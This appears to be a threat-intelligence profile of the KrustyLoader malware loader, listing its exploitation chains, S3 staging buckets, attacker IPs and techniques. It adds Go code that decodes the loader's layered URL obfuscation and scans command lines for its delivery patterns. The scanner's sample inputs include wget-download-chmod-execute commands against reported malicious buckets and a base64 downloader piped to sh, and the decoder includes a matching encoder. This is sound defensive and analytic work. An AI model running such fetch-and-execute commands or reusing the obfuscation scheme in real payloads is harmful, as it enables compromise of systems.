KrustyLoader
KrustyLoader is a Rust-based initial-stage malware loader used to retrieve and launch second-stage payloads, most commonly the Sliver backdoor/C2 implant. It was first documented in January 2024 in compromises of Ivanti Connect Secure systems exploiting CVE-2024-21887 and CVE-2023-46805, and has since been observed in additional exploitation chains involving Ivanti Endpoint Manager Mobile (EPMM), Ivanti Sentry, SAP NetWeaver, and Microsoft SharePoint/ToolShell intrusions. Reported delivery mechanisms include abuse of web shells and JSP loaders, direct retrieval from Amazon S3 infrastructure, and downloads via built-in utilities such as wget, curl, and fetch.

On compromised Ivanti EPMM systems, KrustyLoader was reported to retrieve an AES-128-CFB encrypted Sliver payload, decrypt it using a hardcoded key and IV, and inject it into memory as shellcode. One report described an embedded staging URL that was hex-encoded, XOR-encrypted with the single-byte key 0x49, and then AES-128-CFB encrypted; a decrypted example URL was http://abbeglasses.s3.amazonaws[.]com/dSn9tM. Public S3 infrastructure associated with payload delivery included openrbf.s3.amazonaws[.]com, tnegadge.s3.amazonaws[.]com, fconnect.s3.amazonaws[.]com, trkbucket.s3.amazonaws[.]com, the-mentor.s3.amazonaws[.]com, and tkshopqd.s3.amazonaws[.]com.

KrustyLoader has been consistently associated with the China-nexus threat actor UNC5221, also tracked as UTA0178 and in some reporting as QuietCrabs, and has appeared in broader Chinese espionage activity alongside malware such as Zingdoor and ShadowPad. It has been observed targeting internet-exposed edge and enterprise systems across sectors including government, telecom, healthcare, finance, logistics, manufacturing, and universities. Although some vendors described it as Linux malware, reporting also documented Windows samples in incidents attributed to QuietCrabs.

High-confidence related infrastructure and observables reported for this family include AWS S3-hosted payloads and the attacker IP addresses 27.25.148[.]183, 64.52.80[.]21:4444, 103.244.88[.]125:8080, and 146.70.87[.]67:45020 (the last observed as an outbound connection destination).
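To make the reported URL obfuscation concrete, the Go program below (an added example, not code from this page or from any vendor report; KrustyLoader itself is written in Rust, but Go's standard library carries AES) reverses the three layers in the order an analyst must apply them: AES-128-CFB decrypt with the key and IV recovered from the sample, XOR every byte with 0x49, then hex-decode. The key, IV and encoded blob are placeholders built inside the program from the page's own example URL (refanged); the real hardcoded key and IV are not reproduced on this page and are assumptions here. Full-block CFB is implemented explicitly so the mode is visible, and the checks at the end are what tell you the key or the layer order was wrong.

```go
package main

import (
	"crypto/aes"
	"encoding/hex"
	"fmt"
	"strings"
)

// Single-byte XOR key reported for the embedded staging URL.
const xorKey byte = 0x49

// cfb128 runs AES in full-block (128-bit segment) CFB mode, which is what
// "AES-128-CFB" means in OpenSSL and in the Rust cfb-mode crate. One routine
// serves both directions; only the feedback source differs.
func cfb128(key, iv, in []byte, decrypt bool) ([]byte, error) {
	blk, err := aes.NewCipher(key) // a 16-byte key selects AES-128
	if err != nil {
		return nil, err
	}
	bs := blk.BlockSize()
	if len(iv) != bs {
		return nil, fmt.Errorf("iv must be %d bytes, got %d", bs, len(iv))
	}
	out := make([]byte, len(in))
	prev := append([]byte(nil), iv...)
	ks := make([]byte, bs)
	for i := 0; i < len(in); i += bs {
		end := i + bs
		if end > len(in) {
			end = len(in) // CFB needs no padding: the final segment may be short
		}
		blk.Encrypt(ks, prev) // keystream = E_k(previous ciphertext block)
		for j := i; j < end; j++ {
			out[j] = in[j] ^ ks[j-i]
		}
		if decrypt {
			copy(prev, in[i:end]) // ciphertext is the input
		} else {
			copy(prev, out[i:end]) // ciphertext is what we just produced
		}
	}
	return out, nil
}

// DecodeStagingURL reverses the reported layering in order:
// AES-128-CFB decrypt -> XOR each byte with 0x49 -> hex-decode.
func DecodeStagingURL(blob, key, iv []byte) (string, error) {
	layer, err := cfb128(key, iv, blob, true)
	if err != nil {
		return "", err
	}
	for i := range layer {
		layer[i] ^= xorKey
	}
	raw, err := hex.DecodeString(string(layer))
	if err != nil {
		return "", fmt.Errorf("hex layer did not decode (wrong key/iv, or layers applied out of order): %w", err)
	}
	url := string(raw)
	if !strings.HasPrefix(url, "http://") && !strings.HasPrefix(url, "https://") {
		return "", fmt.Errorf("decoded bytes are not a URL: %q", url)
	}
	return url, nil
}

// EncodeStagingURL applies the same three layers forward. It exists only so
// this example can build an input blob offline; it is not a claim about how
// the operators built their samples.
func EncodeStagingURL(url string, key, iv []byte) ([]byte, error) {
	layer := []byte(hex.EncodeToString([]byte(url)))
	for i := range layer {
		layer[i] ^= xorKey
	}
	return cfb128(key, iv, layer, false)
}

func main() {
	// Placeholder key/IV (assumption): the real hardcoded values are not on this page.
	key := []byte("0123456789abcdef")
	iv := []byte("fedcba9876543210")
	// Refanged form of the decrypted example URL quoted above; nothing is fetched.
	blob, _ := EncodeStagingURL("http://abbeglasses.s3.amazonaws.com/dSn9tM", key, iv)
	fmt.Printf("blob (%d bytes): %x\n", len(blob), blob)
	url, err := DecodeStagingURL(blob, key, iv)
	fmt.Println("decoded:", url, "err:", err)
	_, err = DecodeStagingURL(blob, []byte("ffffffffffffffff"), iv)
	fmt.Println("wrong key ->", err)
}
```

In practice the blob comes from the sample (the hex string from XOR layer is fixed-length, so its ciphertext is the same length), and the key and IV come from the binary's read-only data; if the hex step fails on real input, check the key/IV first, then whether the sample in hand uses a different XOR key than the one reported.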
Vulnerabilities exploited
5 CVEs Mallory has correlated with this family across public research and vendor advisories.
On July 25, KrustyLoader was dropped by the attackers. KrustyLoader was first documented in January 2024. It is an initial-stage malware, written in Rust, which has the primary purpose of delivering a second-stage payload.
“EclecticIQ analysts observed the execution of KrustyLoader malware within compromised Ivanti EPMM systems… Once installed, KrustyLoader retrieves a second-stage payload — an AES-128-CFB encrypted version of the Sliver backdoor.”

On Thursday, May 15, 2025, Ivanti disclosed two critical vulnerabilities - CVE-2025-4427 and CVE-2025-4428 - affecting Ivanti Endpoint Manager Mobile (EPMM) version 12.5.0.0 and earlier. These vulnerabilities can be chained to achieve unauthenticated remote code execution (RCE) on exposed systems.
UNC5221 was seen abusing a webshell to execute remote commands and fetch from an AWS S3 infrastructure the Rust-based malware loader KrustyLoader, which is typically used for dropping Sliver backdoors.
Groups observed using it
1 distinct threat actor attributed by public researchers: UNC5221, also tracked as UTA0178 and, in some reporting, as QuietCrabs.
Techniques & procedures
9 distinct techniques documented for this family, organized by ATT&CK tactic.
Initial Access (1 technique)
China-based attackers used the ToolShell vulnerability (CVE-2025-53770) to compromise a telecoms company in the Middle East shortly after the vulnerability was publicly revealed and patched in July 2025... In these attacks, the attackers used other vulnerabilities for initial access and exploited SQL servers and Apache HTTP servers running the Adobe ColdFusion software to deliver their malware.
Execution (1 technique)
Privilege Escalation (1 technique)
Stealth (5 techniques)
“Base64-encoded payload embedded in a GET request” and “Obfuscated Bash script downloading and executing a payload…”
“injects it directly into memory as shellcode… The resulting payload is loaded directly into memory and executed as shellcode”
KrustyLoader... can make a copy of itself and set itself up to self-delete when its activity is finished...
Discovery (1 technique)
Command and Control (2 techniques)
“forming a reliable command-and-control (C2) mechanism using server-side Java injection” and repeated use of HTTP GET/curl/wget to retrieve payloads
KrustyLoader... can decrypt and download additional malware. Its previous activity has been linked to China-based threat actors, and in earlier campaigns it was also used to download the Sliver post-exploitation framework, which is also seen deployed against this target.
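The Stealth and Command and Control evidence above reduces to a few shapes that show up in command-line telemetry: wget, curl or fetch pulling a payload from an S3 bucket, and a base64 blob piped through a decoder into a shell. The Go program below is an added hunting example, not code from this page or from any vendor cited on it. The bucket hostnames are the ones the page lists; the command lines it scans, including the bucket not-on-the-list.s3.amazonaws.com, are constructed for the example. It decodes base64 it encounters and rescans the result, so a downloader hidden behind `echo … | base64 -d | sh` is attributed to the same rule.

```go
package main

import (
	"encoding/base64"
	"fmt"
	"regexp"
	"strings"
)

// S3 bucket hosts reported as KrustyLoader payload sources (from the page; not exhaustive).
var knownBuckets = map[string]bool{
	"abbeglasses.s3.amazonaws.com": true,
	"openrbf.s3.amazonaws.com":     true,
	"tnegadge.s3.amazonaws.com":    true,
	"fconnect.s3.amazonaws.com":    true,
	"trkbucket.s3.amazonaws.com":   true,
	"the-mentor.s3.amazonaws.com":  true,
	"tkshopqd.s3.amazonaws.com":    true,
}

var (
	// A downloader utility followed, within the same command, by an http(s) URL; group 3 is the host.
	fetchRe = regexp.MustCompile(`\b(wget|curl|fetch)\b[^;&|]*?(https?://([A-Za-z0-9.-]+)[^\s'"]*)`)
	// A base64 blob echoed into a decoder (echo <blob> | base64 -d ...); group 1 is the blob.
	b64Re = regexp.MustCompile(`echo\s+['"]?([A-Za-z0-9+/=]{16,})['"]?\s*\|\s*base64\s+(?:-d|--decode)`)
	// Any virtual-hosted-style S3 bucket hostname.
	s3HostRe = regexp.MustCompile(`^[a-z0-9.-]+\.s3\.amazonaws\.com$`)
)

// Finding is one hit: the original telemetry line, why it matched, and the URL involved.
type Finding struct {
	Line, Reason, URL string
}

// scanLine applies the rules to one command line. depth bounds the base64 rescan.
func scanLine(line string, depth int) []Finding {
	var out []Finding
	for _, m := range fetchRe.FindAllStringSubmatch(line, -1) {
		url, host := m[2], strings.ToLower(m[3])
		switch {
		case knownBuckets[host]:
			out = append(out, Finding{Line: line, URL: url,
				Reason: "downloader fetching from a bucket reported as KrustyLoader infrastructure"})
		case s3HostRe.MatchString(host):
			out = append(out, Finding{Line: line, URL: url,
				Reason: "downloader fetching from an S3 bucket (matches reported delivery pattern; triage)"})
		}
	}
	if depth < 2 {
		for _, m := range b64Re.FindAllStringSubmatch(line, -1) {
			raw, err := base64.StdEncoding.DecodeString(m[1])
			if err != nil {
				continue // not valid base64; nothing to rescan
			}
			for _, f := range scanLine(string(raw), depth+1) {
				f.Line = line
				f.Reason = "inside base64-decoded payload: " + f.Reason
				out = append(out, f)
			}
		}
	}
	return out
}

// ScanCommandLines runs scanLine over a batch of telemetry lines in order.
func ScanCommandLines(lines []string) []Finding {
	var out []Finding
	for _, l := range lines {
		out = append(out, scanLine(l, 0)...)
	}
	return out
}

// SampleCommandLines are constructed process command lines: three that should fire, two benign.
func SampleCommandLines() []string {
	inner := "wget -q -O /tmp/.s http://trkbucket.s3.amazonaws.com/qw && chmod +x /tmp/.s && /tmp/.s"
	return []string{
		`sh -c "wget -q -O /tmp/.k http://openrbf.s3.amazonaws.com/Jk3l && chmod +x /tmp/.k && /tmp/.k"`,
		`curl -fsSL https://not-on-the-list.s3.amazonaws.com/p -o /tmp/p`, // bucket name is made up
		"echo " + base64.StdEncoding.EncodeToString([]byte(inner)) + " | base64 -d | sh",
		`curl -s https://api.github.com/repos/example/repo`,
		`wget https://example.com/file.tar.gz`,
	}
}

func main() {
	for _, f := range ScanCommandLines(SampleCommandLines()) {
		fmt.Printf("%-55s %s\n", f.URL, f.Reason)
	}
}
```

The generic S3 rule will fire on legitimate S3 traffic on hosts that routinely pull artifacts from buckets, so treat it as a triage signal keyed on which hosts (Ivanti, SharePoint, SAP edge systems) should never spawn wget or curl at all; the known-bucket rule is the high-confidence one.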
IOCs tracked for this family
8 indicators attributed across vendor reports, sandbox runs, and researcher write-ups.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Recent activity
11 sources tracked across advisories, community write-ups, and news.
KrustyLoader is a loader malware used to download and execute additional payloads, such as the Sliver implant, after initial access.
Backdoor/loader deployed against edge networking devices by the QuietCrabs cluster.
KrustyLoader is a loader malware associated with the QuietCrabs threat actor, used to deploy additional payloads and facilitate further compromise. It has been observed in both Linux and Windows environments.
Symantec Exposes Chinese APT Overlap: Zingdoor, ShadowPad, and KrustyLoader Used in Global Espionage